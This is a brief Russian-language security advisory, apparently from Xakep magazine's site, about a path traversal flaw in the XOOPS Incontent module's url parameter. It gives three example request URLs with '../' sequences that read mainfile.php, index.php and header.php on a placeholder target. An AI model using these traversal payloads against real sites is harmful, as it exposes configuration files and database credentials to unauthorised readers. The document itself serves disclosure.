Просмотр содержимого файлов в XOOPS Incontent module

Рекомендуем почитать:

Xakep #288. Неправильные эльфы

Содержание выпуска
Подписка на «Хакер»-60%

Программа: XOOPS Incontent module

Уязвимость позволяет удаленному
пользователю просмотреть содержимое
произвольных сценариев на уязвимой системе.
Уязвимый модуль некорректно обрабатывает
параметр url. Удаленный пользователь может
просмотреть содержимое произвольных
сценариев на системе.

Пример:

http://[target]/modules/incontent/index.php? op=aff&optio n=0&url=../../../mainfile.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../.
./index.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../../header.php

Просмотр содержимого файлов в XOOPS Incontent module

Xakep #288. Неправильные эльфы

Последние взломы

Киберфон. Превращаем телефон на Android в инструмент хакера

HTB Absolute. Атакуем Active Directory с повышением привилегий через KrbRelay

Фундаментальные основы хакерства. Осваиваем разные способы поиска защит в программах для x86-64

HTB Precious. Эксплуатируем простую RCE в приложении на Ruby

Компьютерные трюки

VPN для друзей. Разворачиваем свой VPN-сервер с оплатой через Telegram

Запретный апгрейд. Взламываем UEFI ноутбука Lenovo, чтобы поменять адаптер Wi-Fi

Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе

Крококряк. Снимаем трафик с витой пары обычными «крокодилами»

Свежие новости

Утилита triangle_check ищет атаки на iOS, связанные с «Операцией Триангуляция»

Эксперты: в открытом доступе опубликована БД сайта «Ренессанс Страхования»

Из Chrome Web Store удалили расширения, установленные 75 млн раз

Toyota выявила новую утечку данных

«Убийца антивирусов» с хакерских форумов оказался вариацией BYOVD-атаки